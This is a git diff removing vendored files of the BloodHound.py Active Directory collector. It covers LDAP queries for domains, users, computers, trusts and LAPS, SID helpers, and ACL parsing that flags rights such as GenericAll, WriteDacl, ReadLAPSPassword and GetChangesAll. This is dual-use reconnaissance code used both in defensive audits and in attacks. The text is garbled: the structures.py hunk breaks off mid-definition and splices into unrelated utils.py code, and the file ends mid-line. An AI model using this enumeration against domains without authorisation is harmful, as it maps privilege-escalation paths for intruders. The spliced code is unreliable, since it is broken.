'(objectClass=*)', - attributes=['name', 'schemaidguid']) - for res in sresult: - if res['attributes']['schemaIDGUID']: - guid = str(UUID(bytes_le=res['attributes']['schemaIDGUID'])) - self.objecttype_guid_map[res['attributes']['name'].lower()] = guid - - if 'ms-mcs-admpwdexpirationtime' in self.objecttype_guid_map: - logging.debug('Found LAPS attributes in schema') - self.ad.has_laps = True - else: - logging.debug('No LAPS attributes found in schema') - - def get_domains(self, acl=False): - """ - Function to get domains. This should only return the current domain. - """ - entries = self.search('(objectClass=domain)', - [], - generator=True, - query_sd=acl) - - entriesNum = 0 - for entry in entries: - entriesNum += 1 - # Todo: actually use these objects instead of discarding them - # means rewriting other functions - domain_object = ADDomain.fromLDAP(entry['attributes']['distinguishedName'], entry['attributes']['objectSid']) - self.ad.domain_object = domain_object - self.ad.domains[entry['attributes']['distinguishedName']] = entry - try: - nbentry = self.get_netbios_name(entry['attributes']['distinguishedName']) - self.ad.nbdomains[nbentry['attributes']['nETBIOSName']] = entry - except IndexError: - pass - - logging.info('Found %u domains', entriesNum) - - return entries - - def get_forest_domains(self): - """ - Function which searches the LDAP references in order to find domains. - I'm not sure if this is the best function but couldn't find anything better. - - This searches the configuration, which is present only once in the forest but is replicated - to every DC. - """ - entries = self.search('(objectClass=crossRef)', - ['nETBIOSName', 'systemFlags', 'nCName', 'name'], - search_base="CN=Partitions,%s" % self.ldap.server.info.other['configurationNamingContext'][0], - generator=True) - - entriesNum = 0 - for entry in entries: - # Ensure systemFlags entry is not empty before running the naming context check. - if not entry['attributes']['systemFlags']: - continue - # This is a naming context, but not a domain - if not entry['attributes']['systemFlags'] & 2: - continue - entry['attributes']['distinguishedName'] = entry['attributes']['nCName'] - entriesNum += 1 - # Todo: actually use these objects instead of discarding them - # means rewriting other functions - d = ADDomain.fromLDAP(entry['attributes']['nCName']) - # We don't want to add our own domain since this entry doesn't contain the sid - # which we need later on - if entry['attributes']['nCName'] not in self.ad.domains: - self.ad.domains[entry['attributes']['nCName']] = entry - self.ad.nbdomains[entry['attributes']['nETBIOSName']] = entry - - # Store this number so we can easily determine if we are in a multi-domain - # forest later on. - self.ad.num_domains = entriesNum - logging.info('Found %u domains in the forest', entriesNum) - - def get_groups(self, include_properties=False, acl=False): - properties = ['distinguishedName', 'samaccountname', 'samaccounttype', 'objectsid', 'member'] - if include_properties: - properties += ['adminCount', 'description'] - if acl: - properties += ['nTSecurityDescriptor'] - entries = self.search('(objectClass=group)', - properties, - generator=True, - query_sd=acl) - return entries - - - def get_users(self, include_properties=False, acl=False): - - properties = ['sAMAccountName', 'distinguishedName', 'sAMAccountType', - 'objectSid', 'primaryGroupID'] - if 'msDS-GroupMSAMembership'.lower() in self.objecttype_guid_map: - properties.append('msDS-GroupMSAMembership') - if include_properties: - properties += ['servicePrincipalName', 'userAccountControl', 'displayName', - 'lastLogon', 'lastLogonTimestamp', 'pwdLastSet', 'mail', 'title', 'homeDirectory', - 'description', 'userPassword', 'adminCount', 'msDS-AllowedToDelegateTo', 'sIDHistory'] - if acl: - properties.append('nTSecurityDescriptor') - - # Query for GMSA only if server supports it - if 'msDS-GroupManagedServiceAccount' in self.ldap.server.schema.object_classes: - query = '(|(&(objectCategory=person)(objectClass=user))(objectClass=msDS-GroupManagedServiceAccount))' - else: - logging.debug('No support for GMSA, skipping in query') - query = '(&(objectCategory=person)(objectClass=user))' - entries = self.search(query, - properties, - generator=True, - query_sd=acl) - return entries - - - def get_computers(self, include_properties=False, acl=False): - properties = ['samaccountname', 'userAccountControl', 'distinguishedname', - 'dnshostname', 'samaccounttype', 'objectSid', 'primaryGroupID'] - if include_properties: - properties += ['servicePrincipalName', 'msDS-AllowedToDelegateTo', - 'lastLogon', 'lastLogonTimestamp', 'pwdLastSet', 'operatingSystem', 'description', 'operatingSystemServicePack'] - if 'msDS-AllowedToActOnBehalfOfOtherIdentity'.lower() in self.objecttype_guid_map: - properties.append('msDS-AllowedToActOnBehalfOfOtherIdentity') - if self.ad.has_laps: - properties.append('ms-mcs-admpwdexpirationtime') - if acl: - # Also collect LAPS expiration time since this matters for reporting (no LAPS = no ACL reported) - if self.ad.has_laps: - properties += ['nTSecurityDescriptor', 'ms-mcs-admpwdexpirationtime'] - else: - properties.append('nTSecurityDescriptor') - entries = self.search('(&(sAMAccountType=805306369)(!(UserAccountControl:1.2.840.113556.1.4.803:=2)))', - properties, - generator=True, - query_sd=acl) - - entriesNum = 0 - for entry in entries: - entriesNum += 1 - self.ad.computers[ADUtils.get_entry_property(entry, 'distinguishedName', '')] = entry - self.ad.computersidcache.put(ADUtils.get_entry_property(entry, 'dNSHostname', '').lower(), entry['attributes']['objectSid']) - - logging.info('Found %u computers', entriesNum) - - return entries - - def get_memberships(self): - entries = self.search('(|(memberof=*)(primarygroupid=*))', - ['samaccountname', 'distinguishedname', - 'dnshostname', 'samaccounttype', 'primarygroupid', - 'memberof'], - generator=False) - return entries - - def get_sessions(self): - entries = self.search('(&(samAccountType=805306368)(!(userAccountControl:1.2.840.113556.1.4.803:=2))(|(homedirectory=*)(scriptpath=*)(profilepath=*)))', - ['homedirectory', 'scriptpath', 'profilepath']) - return entries - - def get_trusts(self): - entries = self.search('(objectClass=trustedDomain)', - attributes=['flatName', 'name', 'securityIdentifier', 'trustAttributes', 'trustDirection', 'trustType'], - generator=True) - return entries - - def prefetch_info(self, props=False, acls=False): - if acls: - self.get_objecttype() - self.get_domains(acl=acls) - self.get_forest_domains() - self.get_computers(include_properties=props, acl=acls) - - def get_root_domain(self): - return ADUtils.ldap2domain(self.ldap.server.info.other['configurationNamingContext'][0]) - - -""" -Active Directory data and cache -""" -class AD(object): - - def __init__(self, domain=None, auth=None, nameserver=None, dns_tcp=False): - self.domain = domain - # Object of type ADDomain, added later - self.domain_object = None - self.auth = auth - # List of DCs for this domain. Contains just one DC since - # we query for the primary DC specifically - self._dcs = [] - # Kerberos servers - self._kdcs = [] - # Global catalog servers - self._gcs = [] - - self.domains = {} - self.nbdomains = {} - self.groups = {} # Groups by DN - self.groups_dnmap = {} # Group mapping from gid to DN - self.computers = {} - self.users = {} # Users by DN - - # Create a resolver object - self.dnsresolver = resolver.Resolver() - if nameserver: - self.dnsresolver.nameservers = [nameserver] - # Resolve DNS over TCP? - self.dns_tcp = dns_tcp - # Give it a cache to prevent duplicate lookups - self.dnsresolver.cache = resolver.Cache() - # Default timeout after 3 seconds if the DNS servers - # do not come up with an answer - self.dnsresolver.lifetime = 3.0 - # Also create a custom cache for both forward and backward lookups - # this cache is thread-safe - self.dnscache = DNSCache() - # Create a thread-safe SID lookup cache - self.sidcache = SidCache() - # Create a thread-safe SAM lookup cache - self.samcache = SamCache() - # Create SID cache for computer accounts - self.computersidcache = SidCache() - # Object Resolver, initialized later - self.objectresolver = None - # Number of domains within the forest - self.num_domains = 1 - # Does the schema have laps properties - self.has_laps = False - if domain is not None: - self.baseDN = ADUtils.domain2ldap(domain) - else: - self.baseDN = None - - def realm(self): - if self.domain is not None: - return self.domain.upper() - else: - return None - - def override_dc(self, dcname): - self._dcs = [dcname] - - def override_gc(self, gcname): - self._gcs = [gcname] - - def dcs(self): - return self._dcs - - def gcs(self): - return self._gcs - - def kdcs(self): - return self._kdcs - - def create_objectresolver(self, addc): - self.objectresolver = ObjectResolver(addomain=self, addc=addc) - - def dns_resolve(self, domain=None, kerberos=True, options=None): - logging.debug('Querying domain controller information from DNS') - - basequery = '_ldap._tcp.pdc._msdcs' - - if domain is not None: - logging.debug('Using domain hint: %s' % str(domain)) - query = '_ldap._tcp.pdc._msdcs.%s' % domain - else: - # Assume a DNS search domain is (correctly) configured on the host - # in which case the resolver will autocomplete our request - query = basequery - - try: - - q = self.dnsresolver.query(query, 'SRV', tcp=self.dns_tcp, lifetime=30.0) - - if str(q.qname).lower().startswith('_ldap._tcp.pdc._msdcs'): - ad_domain = str(q.qname).lower()[len(basequery):].strip('.') - logging.info('Found AD domain: %s' % ad_domain) - - self.domain = ad_domain - if self.auth.domain is None: - self.auth.domain = ad_domain - self.baseDN = ADUtils.domain2ldap(ad_domain) - - for r in q: - dc = str(r.target).rstrip('.') - logging.debug('Found primary DC: %s' % dc) - if dc not in self._dcs: - self._dcs.append(dc) - - except resolver.NXDOMAIN: - raise resolver.NXDOMAIN - - try: - q = self.dnsresolver.query(query.replace('pdc','gc'), 'SRV', tcp=self.dns_tcp) - for r in q: - gc = str(r.target).rstrip('.') - logging.debug('Found Global Catalog server: %s' % gc) - if gc not in self._gcs: - self._gcs.append(gc) - - except resolver.NXDOMAIN: - # Only show warning if we don't already have a GC specified manually - if options and not options.global_catalog: - logging.warning('Could not find a global catalog server. Please specify one with -gc') - - if kerberos is True: - try: - q = self.dnsresolver.query('_kerberos._tcp.dc._msdcs', 'SRV', tcp=self.dns_tcp) - for r in q: - kdc = str(r.target).rstrip('.') - logging.debug('Found KDC: %s' % str(r.target).rstrip('.')) - if kdc not in self._kdcs: - self._kdcs.append(kdc) - self.auth.kdc = self._kdcs[0] - except resolver.NXDOMAIN: - pass - - return True - - - def get_domain_by_name(self, name): - for domain, entry in iteritems(self.domains): - if 'name' in entry['attributes']: - if entry['attributes']['name'].upper() == name.upper(): - return entry - # Also try domains by NETBIOS definition - for domain, entry in iteritems(self.nbdomains): - if domain.upper() == name.upper(): - return entry - return None - -""" -Active Directory Domain -""" -class ADDomain(object): - def __init__(self, name=None, netbios_name=None, sid=None, distinguishedname=None): - self.name = name - self.netbios_name = netbios_name - self.sid = sid - self.distinguishedname = distinguishedname - - - @staticmethod - def fromLDAP(identifier, sid=None): - dns_name = ADUtils.ldap2domain(identifier) - return ADDomain(name=dns_name, sid=sid, distinguishedname=identifier) diff --git a/external/bloodhound/ad/structures.py b/external/bloodhound/ad/structures.py deleted file mode 100755 index e0cce62..0000000 --- a/external/bloodhound/ad/structures.py +++ /dev/null @@ -1,50 +0,0 @@ -#################### -# -# Copyright (c) 2018 Fox-IT -# -# Permission is hereby granted, free of charge, to any person obtaining a copy -# of this software and associated documentation files (the "Software"), to deal -# in the Software without restriction, including without limitation the rights -# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell -# copies of the Software, and to permit persons to whom the Software is -# furnished to do so, subject to the following conditions: -# -# The above copyright notice and this permission notice shall be included in all -# copies or substantial portions of the Software. -# -# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR -# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, -# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE -# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER -# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, -# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE -# SOFTWARE. -# -#################### - -from impacket.structure import Structure -from struct import unpack - - -# LDAP SID structure - from impackets SAMR_RPC_SID, except the SubAuthority is LE here -class LDAP_SID_IDENTIFIER_AUTHORITY(Structure): - structure = ( - ('Value', '6s'), - ) - - - -class LDAP_SID(Structure): - structure = ( - ('Revision', '(S-[0-9\-]+)') - xml_logontype_rex = re.compile('([A-Za-z0-9]+)') - - @staticmethod - def domain2ldap(domain): - return 'DC=' + ',DC='.join(str(domain).rstrip('.').split('.')) - - - @staticmethod - def ldap2domain(ldap): - return re.sub(',DC=', '.', ldap[ldap.find('DC='):], flags=re.I)[3:] - - - @staticmethod - def tcp_ping(host, port, timeout=1.0): - try: - s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) - s.settimeout(timeout) - s.connect((host, port)) - s.close() - return True - except KeyboardInterrupt: - raise - except: - return False - - @staticmethod - def ip2host(ip, resolver=resolver, use_tcp=False): - result = ip - try: - addr = reversename.from_address(ip) - except dns.exception.SyntaxError: - logging.warning('DNS: invalid address: %s' % ip) - return result - - try: - answer = str(resolver.query(addr, 'PTR', tcp=use_tcp)[0]) - result = answer.rstrip('.') - except (dns.resolver.NXDOMAIN, dns.resolver.Timeout) as e: - pass - except: - logging.warning('DNS lookup failed: %s' % addr) - pass - - return result - - # Translate the binary SID from LDAP into human-readable form - @staticmethod - def formatSid(siddata): - return LDAP_SID(siddata).formatCanonical() - - # Translate SidType to strings accepted by BloodHound - @staticmethod - def translateSidType(sidType): - if sidType == 1: - return 'User' - if sidType == 2: - return 'Group' - # sidType 4 means "alias", this is actually a Domain Local Group - if sidType == 4: - return 'Group' - if sidType == 9: - return 'Computer' - if sidType == 5: - return 'Wellknown' - # Can be a (by BloudHound) unsupported type - # must not be an empty string since this breaks our CSV files - return 'Unknown' - - @staticmethod - def resolve_ad_entry(entry): - """ - Translate an LDAP entry into a dictionary containing the - information used by BloodHound - """ - resolved = {} - dn = '' - domain = '' - - account = ADUtils.get_entry_property(entry, 'sAMAccountName', '') - dn = ADUtils.get_entry_property(entry, 'distinguishedName', '') - if dn != '': - domain = ADUtils.ldap2domain(dn) - resolved['objectid'] = ADUtils.get_entry_property(entry, 'objectSid', '') - resolved['principal'] = ('%s@%s' % (account, domain)).upper() - if not ADUtils.get_entry_property(entry, 'sAMAccountName'): - if 'ForeignSecurityPrincipals' in dn: - resolved['principal'] = domain.upper() - resolved['type'] = 'foreignsecurityprincipal' - if 'name' in entry['attributes']: - # Fix wellknown entries - ename = entry['attributes']['name'] - if ename in ADUtils.WELLKNOWN_SIDS: - name, sidtype = ADUtils.WELLKNOWN_SIDS[ename] - resolved['type'] = sidtype.lower() - resolved['principal'] = ('%s@%s' % (name, domain)).upper() - # Well-known have the domain prefix since 3.0 - resolved['objectid'] = '%s-%s' % (domain.upper(), resolved['objectid']) - else: - # Foreign security principal - resolved['objectid'] = ename - else: - resolved['type'] = 'Unknown' - else: - accountType = ADUtils.get_entry_property(entry, 'sAMAccountType') - if accountType in [268435456, 268435457, 536870912, 536870913]: - resolved['type'] = 'Group' - elif ADUtils.get_entry_property(entry, 'msDS-GroupMSAMembership', default=b'', raw=True) != b'': - resolved['type'] = 'User' - short_name = account.rstrip('$') - resolved['principal'] = ('%s@%s' % (short_name, domain)).upper() - elif accountType in [805306369]: - resolved['type'] = 'Computer' - short_name = account.rstrip('$') - resolved['principal'] = ('%s.%s' % (short_name, domain)).upper() - elif accountType in [805306368]: - resolved['type'] = 'User' - elif accountType in [805306370]: - resolved['type'] = 'trustaccount' - else: - resolved['type'] = 'Domain' - - return resolved - - @staticmethod - def resolve_sid_entry(entry, domain): - """ - Convert LsarLookupSids entries to entries for the SID cache, which should match - the format from the resolve_ad_entry function. - """ - resolved = {} - account = entry['Name'] - - resolved['principal'] = ('%s@%s' % (account, domain)).upper() - resolved['type'] = ADUtils.translateSidType(entry['Use']).lower() - - # Computer accoutns have a different type - if resolved['type'] == 'computer': - short_name = account.rstrip('$') - resolved['principal'] = ('%s.%s' % (short_name, domain)).upper() - - return resolved - - @staticmethod - def get_entry_property(entry, prop, default=None, raw=False): - """ - Simple wrapper that gets an attribute from ldap3 dictionary, - converting empty values to the default specified. This is primarily - for output to JSON - """ - try: - if raw: - value = entry['raw_attributes'][prop] - else: - value = entry['attributes'][prop] - # Doesn't exist - except KeyError: - return default - # Empty -> return default - if value == []: - return default - try: - # One value and we don't expect a list -> return the first value - if len(value) == 1 and default != []: - return value[0] - except TypeError: - # Value doesn't have a len() attribute, so we skip this - pass - return value - - @staticmethod - def win_timestamp_to_unix(seconds): - """ - Convert Windows timestamp (100 ns since 1 Jan 1601) to - unix timestamp. - """ - seconds = int(seconds) - if seconds == 0: - return -1 - return int((seconds - 116444736000000000) / 10000000) - - @staticmethod - def parse_task_xml(xml): - """ - Parse scheduled task XML and extract the user and logon type with - regex. Is not a good way to parse XMLs but saves us the whole parsing - overhead. - """ - res = ADUtils.xml_sid_rex.search(xml) - if not res: - return None - sid = res.group(1) - res = ADUtils.xml_logontype_rex.search(xml) - if not res: - return None - logon_type = res.group(1) - return (sid, logon_type) - -class AceResolver(object): - """ - This class resolves ACEs containing rights, acetype and a SID to Aces containing - BloodHound principals, which can be outputted to json. - This is mostly a wrapper around the sid resolver calls - """ - def __init__(self, addomain, resolver): - self.addomain = addomain - self.resolver = resolver - - def resolve_aces(self, aces): - aces_out = [] - for ace in aces: - out = { - 'RightName': ace['rightname'], - 'AceType': ace['acetype'], - 'IsInherited': ace['inherited'] - } - # Is it a well-known sid? - if ace['sid'] in ADUtils.WELLKNOWN_SIDS: - out['PrincipalSID'] = u'%s-%s' % (self.addomain.domain.upper(), ace['sid']) - out['PrincipalType'] = ADUtils.WELLKNOWN_SIDS[ace['sid']][1].capitalize() - else: - try: - entry = self.addomain.sidcache.get(ace['sid']) - except KeyError: - # Look it up instead - # Is this SID part of the current domain? If not, use GC - use_gc = not ace['sid'].startswith(self.addomain.domain_object.sid) - ldapentry = self.resolver.resolve_sid(ace['sid'], use_gc) - # Couldn't resolve... - if not ldapentry: - logging.warning('Could not resolve SID: %s', ace['sid']) - # Fake it - entry = { - 'type': 'Unknown', - 'principal': ace['sid'] - } - else: - entry = ADUtils.resolve_ad_entry(ldapentry) - # Entries are cached regardless of validity - unresolvable sids - # are not likely to be resolved the second time and this saves traffic - self.addomain.sidcache.put(ace['sid'], entry) - out['PrincipalSID'] = ace['sid'] - out['PrincipalType'] = entry['type'] - aces_out.append(out) - return aces_out - - def resolve_binary_sid(self, bsid): - sid = LDAP_SID(bsid).formatCanonical() - out = {} - # Is it a well-known sid? - if sid in ADUtils.WELLKNOWN_SIDS: - out['ObjectID'] = u'%s-%s' % (self.addomain.domain.upper(), sid) - out['ObjectType'] = ADUtils.WELLKNOWN_SIDS[sid][1].capitalize() - else: - try: - entry = self.addomain.sidcache.get(sid) - except KeyError: - # Look it up instead - # Is this SID part of the current domain? If not, use GC - use_gc = not sid.startswith(self.addomain.domain_object.sid) - ldapentry = self.resolver.resolve_sid(sid, use_gc) - # Couldn't resolve... - if not ldapentry: - logging.warning('Could not resolve SID: %s', sid) - # Fake it - entry = { - 'type': 'Unknown', - 'principal':sid - } - else: - entry = ADUtils.resolve_ad_entry(ldapentry) - # Entries are cached regardless of validity - unresolvable sids - # are not likely to be resolved the second time and this saves traffic - self.addomain.sidcache.put(sid, entry) - out['ObjectID'] = sid - out['ObjectType'] = entry['type'] - - -class DNSCache(object): - """ - A cache used for caching forward and backward DNS at the same time. - This cache is used to avoid PTR queries when forward lookups are already done - """ - def __init__(self): - self.lock = threading.Lock() - self._cache = {} - - # Get an entry from the cache - def get(self, entry): - with self.lock: - return self._cache[entry] - - # Put a forward lookup in the cache, this also - # puts the reverse lookup in the cache - def put(self, entry, value): - with self.lock: - self._cache[entry] = value - self._cache[value] = entry - - # Put a reverse lookup in the cache. Forward lookup - # is not added since reverse is considered less reliable - def put_single(self, entry, value): - with self.lock: - self._cache[entry] = value - -class SidCache(object): - """ - Generic cache for caching SID lookups - """ - def __init__(self): - self.lock = threading.Lock() - self._cache = {} - - # Get an entry from the cache - def get(self, entry): - with self.lock: - return self._cache[entry] - - # Put a forward lookup in the cache, this also - # puts the reverse lookup in the cache - def put(self, entry, value): - with self.lock: - self._cache[entry] = value - -class SamCache(SidCache): - """ - Cache for mapping SAM names to principals. - Identical to the SidCache in behaviour - """ - pass diff --git a/external/bloodhound/enumeration/acls.py b/external/bloodhound/enumeration/acls.py deleted file mode 100755 index 8b3ed91..0000000 --- a/external/bloodhound/enumeration/acls.py +++ /dev/null @@ -1,511 +0,0 @@ -#################### -# -# Copyright (c) 2018 Fox-IT -# -# Permission is hereby granted, free of charge, to any person obtaining a copy -# of this software and associated documentation files (the "Software"), to deal -# in the Software without restriction, including without limitation the rights -# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell -# copies of the Software, and to permit persons to whom the Software is -# furnished to do so, subject to the following conditions: -# -# The above copyright notice and this permission notice shall be included in all -# copies or substantial portions of the Software. -# -# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR -# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, -# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE -# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER -# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, -# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE -# SOFTWARE. -# -#################### -from __future__ import unicode_literals -import logging -import threading -from multiprocessing import Pool -from ldap3.utils.conv import escape_filter_chars -from impacket.uuid import string_to_bin, bin_to_string -from . .ad.utils import ADUtils -from . .lib import cstruct -from io import BytesIO -import binascii -import pprint -from future.utils import iteritems, native_str - -# Extended rights and property GUID mapping, converted to binary so we don't have to do this -# for every comparison. -# Source: https://msdn.microsoft.com/en-us/library/cc223512.aspx -EXTRIGHTS_GUID_MAPPING = { - "GetChanges": string_to_bin("1131f6aa-9c07-11d1-f79f-00c04fc2dcd2"), - "GetChangesAll": string_to_bin("1131f6ad-9c07-11d1-f79f-00c04fc2dcd2"), - "WriteMember": string_to_bin("bf9679c0-0de6-11d0-a285-00aa003049e2"), - "UserForceChangePassword": string_to_bin("00299570-246d-11d0-a768-00aa006e0529"), -} - -def parse_binary_acl(entry, entrytype, acl, objecttype_guid_map): - """ - Main ACL structure parse function. - This is offloaded to subprocesses and takes the current entry and the - acl data as argument. This is then returned and processed back in the main process - """ - if not acl: - return entry, [] - sd = SecurityDescriptor(BytesIO(acl)) - relations = [] - # Parse owner - osid = str(sd.owner_sid) - ignoresids = ["S-1-3-0", "S-1-5-18"] - # Ignore Creator Owner or Local System - if osid not in ignoresids: - relations.append(build_relation(osid, 'Owner', inherited=False)) - for ace_object in sd.dacl.aces: - if ace_object.ace.AceType != 0x05 and ace_object.ace.AceType != 0x00: - # These are the only two aces we care about currently - logging.debug('Don\'t care about acetype %d', ace_object.ace.AceType) - continue - # Check if sid is ignored - sid = str(ace_object.acedata.sid) - # Ignore Creator Owner or Local System - if sid in ignoresids: - continue - if ace_object.ace.AceType == 0x05: - is_inherited = ace_object.has_flag(ACE.INHERITED_ACE) - # ACCESS_ALLOWED_OBJECT_ACE - if not ace_object.has_flag(ACE.INHERITED_ACE) and ace_object.has_flag(ACE.INHERIT_ONLY_ACE): - # ACE is set on this object, but only inherited, so not applicable to us - continue - - # Check if the ACE has restrictions on object type (inherited case) - if ace_object.has_flag(ACE.INHERITED_ACE) \ - and ace_object.acedata.has_flag(ACCESS_ALLOWED_OBJECT_ACE.ACE_INHERITED_OBJECT_TYPE_PRESENT): - # Verify if the ACE applies to this object type - if not ace_applies(ace_object.acedata.get_inherited_object_type().lower(), entrytype, objecttype_guid_map): - continue - - mask = ace_object.acedata.mask - # Now the magic, we have to check all the rights BloodHound cares about - - # Check generic access masks first - if mask.has_priv(ACCESS_MASK.GENERIC_ALL) or mask.has_priv(ACCESS_MASK.WRITE_DACL) \ - or mask.has_priv(ACCESS_MASK.WRITE_OWNER) or mask.has_priv(ACCESS_MASK.GENERIC_WRITE): - # For all generic rights we should check if it applies to our object type - if ace_object.acedata.has_flag(ACCESS_ALLOWED_OBJECT_ACE.ACE_OBJECT_TYPE_PRESENT) \ - and not ace_applies(ace_object.acedata.get_object_type().lower(), entrytype, objecttype_guid_map): - # If it does not apply, break out of the loop here in order to - # avoid individual rights firing later on - continue - # Check from high to low, ignore lower privs which may also match the bitmask, - # even though this shouldn't happen since we check for exact matches currently - if mask.has_priv(ACCESS_MASK.GENERIC_ALL): - # Report this as LAPS rights if it's a computer object AND laps is enabled - if entrytype == 'computer' and \ - ace_object.acedata.has_flag(ACCESS_ALLOWED_OBJECT_ACE.ACE_OBJECT_TYPE_PRESENT) and \ - entry['Properties']['haslaps']: - if ace_object.acedata.get_object_type().lower() == objecttype_guid_map['ms-mcs-admpwd']: - relations.append(build_relation(sid, 'ReadLAPSPassword', inherited=is_inherited)) - else: - relations.append(build_relation(sid, 'GenericAll', inherited=is_inherited)) - continue - if mask.has_priv(ACCESS_MASK.GENERIC_WRITE): - relations.append(build_relation(sid, 'GenericWrite', inherited=is_inherited)) - # Don't skip this if it's the domain object, since BloodHound reports duplicate - # rights as well, and this might influence some queries - if entrytype != 'domain' and entrytype != 'computer': - continue - - # These are specific bitmasks so don't break the loop from here - if mask.has_priv(ACCESS_MASK.WRITE_DACL): - relations.append(build_relation(sid, 'WriteDacl', inherited=is_inherited)) - - if mask.has_priv(ACCESS_MASK.WRITE_OWNER): - relations.append(build_relation(sid, 'WriteOwner', inherited=is_inherited)) - - # Property write privileges - writeprivs = ace_object.acedata.mask.has_priv(ACCESS_MASK.ADS_RIGHT_DS_WRITE_PROP) - if writeprivs: - # GenericWrite - if entrytype in ['user', 'group'] and not ace_object.acedata.has_flag(ACCESS_ALLOWED_OBJECT_ACE.ACE_OBJECT_TYPE_PRESENT): - relations.append(build_relation(sid, 'GenericWrite', inherited=is_inherited)) - if entrytype == 'group' and can_write_property(ace_object, EXTRIGHTS_GUID_MAPPING['WriteMember']): - relations.append(build_relation(sid, 'WriteProperty', 'AddMember', inherited=is_inherited)) - - # Property read privileges - if ace_object.acedata.mask.has_priv(ACCESS_MASK.ADS_RIGHT_DS_READ_PROP): - if entrytype == 'computer' and \ - ace_object.acedata.has_flag(ACCESS_ALLOWED_OBJECT_ACE.ACE_OBJECT_TYPE_PRESENT) and \ - entry['Properties']['haslaps']: - if ace_object.acedata.get_object_type().lower() == objecttype_guid_map['ms-mcs-admpwd']: - relations.append(build_relation(sid, 'ReadLAPSPassword', inherited=is_inherited)) - - # Extended rights - control_access = ace_object.acedata.mask.has_priv(ACCESS_MASK.ADS_RIGHT_DS_CONTROL_ACCESS) - if control_access: - # All Extended - if entrytype in ['user', 'domain', 'computer'] and not ace_object.acedata.has_flag(ACCESS_ALLOWED_OBJECT_ACE.ACE_OBJECT_TYPE_PRESENT): - relations.append(build_relation(sid, 'ExtendedRight', 'All', inherited=is_inherited)) - if entrytype == 'domain' and has_extended_right(ace_object, EXTRIGHTS_GUID_MAPPING['GetChanges']): - relations.append(build_relation(sid, 'ExtendedRight', 'GetChanges', inherited=is_inherited)) - if entrytype == 'domain' and has_extended_right(ace_object, EXTRIGHTS_GUID_MAPPING['GetChangesAll']): - relations.append(build_relation(sid, 'ExtendedRight', 'GetChangesAll', inherited=is_inherited)) - if entrytype == 'user' and has_extended_right(ace_object, EXTRIGHTS_GUID_MAPPING['UserForceChangePassword']): - relations.append(build_relation(sid, 'ExtendedRight', 'User-Force-Change-Password', inherited=is_inherited)) - - # print(ace_object.acedata.sid) - if ace_object.ace.AceType == 0x00: - is_inherited = ace_object.has_flag(ACE.INHERITED_ACE) - mask = ace_object.acedata.mask - # ACCESS_ALLOWED_ACE - if mask.has_priv(ACCESS_MASK.GENERIC_ALL): - # Generic all includes all other rights, so skip from here - relations.append(build_relation(sid, 'GenericAll', inherited=is_inherited)) - continue - - if mask.has_priv(ACCESS_MASK.ADS_RIGHT_DS_WRITE_PROP): - # Genericwrite is only for properties, don't skip after - relations.append(build_relation(sid, 'GenericWrite', inherited=is_inherited)) - - if mask.has_priv(ACCESS_MASK.WRITE_OWNER): - relations.append(build_relation(sid, 'WriteOwner', inherited=is_inherited)) - - # For users and domain, check extended rights - if entrytype in ['user', 'domain'] and mask.has_priv(ACCESS_MASK.ADS_RIGHT_DS_CONTROL_ACCESS): - relations.append(build_relation(sid, 'ExtendedRight', 'All', inherited=is_inherited)) - - if mask.has_priv(ACCESS_MASK.WRITE_DACL): - relations.append(build_relation(sid, 'WriteDacl', inherited=is_inherited)) - - # pprint.pprint(entry) - # pprint.pprint(relations) - return entry, relations - -def can_write_property(ace_object, binproperty): - ''' - Checks if the access is sufficient to write to a specific property. - This can either be because we have the right ADS_RIGHT_DS_WRITE_PROP and the correct GUID - is set in ObjectType, or if we have the ADS_RIGHT_DS_WRITE_PROP right and the ObjectType - is empty, in which case we can write to any property. This is documented in - [MS-ADTS] section 5.1.3.2: https://msdn.microsoft.com/en-us/library/cc223511.aspx - ''' - if not ace_object.acedata.mask.has_priv(ACCESS_MASK.ADS_RIGHT_DS_WRITE_PROP): - return False - if not ace_object.acedata.has_flag(ACCESS_ALLOWED_OBJECT_ACE.ACE_OBJECT_TYPE_PRESENT): - # No ObjectType present - we have generic access on all properties - return True - # Both are binary here - if ace_object.acedata.data.ObjectType == binproperty: - return True - return False - -def has_extended_right(ace_object, binrightguid): - ''' - Checks if the access is sufficient to control the right with the given GUID. - This can either be because we have the right ADS_RIGHT_DS_CONTROL_ACCESS and the correct GUID - is set in ObjectType, or if we have the ADS_RIGHT_DS_CONTROL_ACCESS right and the ObjectType - is empty, in which case we have all extended rights. This is documented in - [MS-ADTS] section 5.1.3.2: https://msdn.microsoft.com/en-us/library/cc223511.aspx - ''' - if not ace_object.acedata.mask.has_priv(ACCESS_MASK.ADS_RIGHT_DS_CONTROL_ACCESS): - return False - if not ace_object.acedata.has_flag(ACCESS_ALLOWED_OBJECT_ACE.ACE_OBJECT_TYPE_PRESENT): - # No ObjectType present - we have all extended rights - return True - # Both are binary here - if ace_object.acedata.data.ObjectType == binrightguid: - return True - return False - -def ace_applies(ace_guid, object_class, objecttype_guid_map): - ''' - Checks if an ACE applies to this object (based on object classes). - Note that this function assumes you already verified that InheritedObjectType is set (via the flag). - If this is not set, the ACE applies to all object types. - ''' - if ace_guid == objecttype_guid_map[object_class]: - return True - # If none of these match, the ACE does not apply to this object - return False - -def build_relation(sid, relation, acetype='', inherited=False): - return {'rightname': relation, 'sid': sid, 'acetype': 